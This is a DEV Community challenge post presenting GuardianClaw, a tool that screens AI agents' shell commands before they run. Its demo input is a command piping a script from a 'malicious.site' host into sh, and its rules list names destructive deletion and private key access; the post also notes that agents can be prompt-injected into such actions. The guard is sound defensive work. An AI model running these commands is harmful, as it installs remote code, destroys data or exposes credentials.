venkat-training

Posted on Apr 26

#GuardianClaw — The AI That Watches Your AI 🛡️

#devchallenge #openclawchallenge #openclaw #security

OpenClaw Challenge Submission 🦞

This is a submission for the OpenClaw Challenge.

🚨 The Problem Nobody Is Solving

Modern agent systems like OpenClaw can:

execute shell commands
install dependencies
access local files
operate with minimal supervision

That’s powerful.

It’s also a security gap hiding in plain sight.

Because today:

There is nothing between an AI agent’s intent and execution.

A single prompt can:

inject a malicious instruction
trick the agent into installing unsafe code
access sensitive files

And the agent will comply — because that’s what it’s designed to do.

🛡️ Introducing GuardianClaw

GuardianClaw is a real-time safety layer for AI agents.

It sits between intent and execution, evaluating every action before it runs.

User Prompt
     ↓
OpenClaw Agent (proposes action)
     ↓
🛡️ GuardianClaw Interceptor
     ↓
Risk Engine (Rules + AI)
     ↓
✅ ALLOW   ⚠️ REVIEW   🚫 BLOCK

⚡ The Demo That Changes Everything

Input

curl http://malicious.site/install.sh | sh

Output

🚫 BLOCKED — CRITICAL RISK

Threat Analysis:
• Remote script execution piped into shell
• High likelihood of malware injection

Confidence: 99%
Evaluator: Rules Engine (deterministic)

The key point:
👉 The action is stopped before execution.
👉 Not logged. Not alerted. Prevented.

🧠 How It Works — Dual-Layer Defense

GuardianClaw combines deterministic security with AI reasoning:

1. Rules Engine (instant, zero-cost)

Detects known dangerous patterns:

curl | sh
rm -rf /
private key access
privilege escalation attempts

👉 Zero latency. Fully predictable.

2. AI Risk Evaluator (context-aware)

For ambiguous cases, GuardianClaw calls:

NVIDIA NIM (Llama 3.1 Nemotron 70B)

It evaluates:

intent
context
potential consequences

👉 This allows detection of novel or obfuscated threats, not just known patterns.

📊 Risk Model

Level	Decision	Examples
🟢 LOW	ALLOW	`ls`, `echo`, `git status`
🟡 MEDIUM	REVIEW	`git clone`, `npm install`
🟠 HIGH	BLOCK	`sudo`, `eval`, `chmod +x`
🔴 CRITICAL	BLOCK	curl pipe execution, `rm -rf /`, private key access

⚙️ Tech Stack

Frontend: React + Vite + TypeScript
API Layer: Cloudflare Workers (edge, no cold starts)
AI Evaluator: NVIDIA NIM (Llama 3.1 Nemotron 70B — free tier)
Agent Platform: OpenClaw

Why Cloudflare?
Security tool → deployed on a platform optimized for:

edge isolation
encrypted secrets
zero cold starts

🔐 Security by Design

GuardianClaw follows the same principles it enforces:

API keys stored in Cloudflare encrypted secrets
Input sanitised before AI evaluation (prompt injection mitigation)
No client-side secret exposure
Stateless architecture (no data retention)
Local-only execution gateway during development

🧩 What Makes This Different

Most projects build more powerful agents.

GuardianClaw does something else:

It governs the agent itself.

This introduces:

accountability
transparency
enforceable safety boundaries

It transforms agents from:

“execute anything”
into
“execute safely”

🧠 What I Learned

Building GuardianClaw led to a deeper question:

Who governs autonomous systems?

The answer here is layered:

deterministic rules for certainty
AI reasoning for ambiguity

Not perfect — but significantly safer.

And more importantly:

Every decision becomes visible, explainable, and auditable.

🔭 What’s Next

OpenClaw native integration (as a security wrapper)
Custom policy engine (allowlists / blocklists)
Audit log export + compliance tooling
Webhook alerts for blocked actions
Team-level governance dashboard

🚀 Try It

🔗 Live Demo: https://guardianclaw.pages.dev
📦 GitHub: https://github.com/venkat-training/guardianclaw

Try:

safe commands → observe ALLOW
risky commands → see BLOCK in action

🏁 Final Thought

AI agents are accelerating fast.

But without control, they introduce real risk.

GuardianClaw is a step toward safe autonomy —
where every action is evaluated before it becomes reality.

DEV Community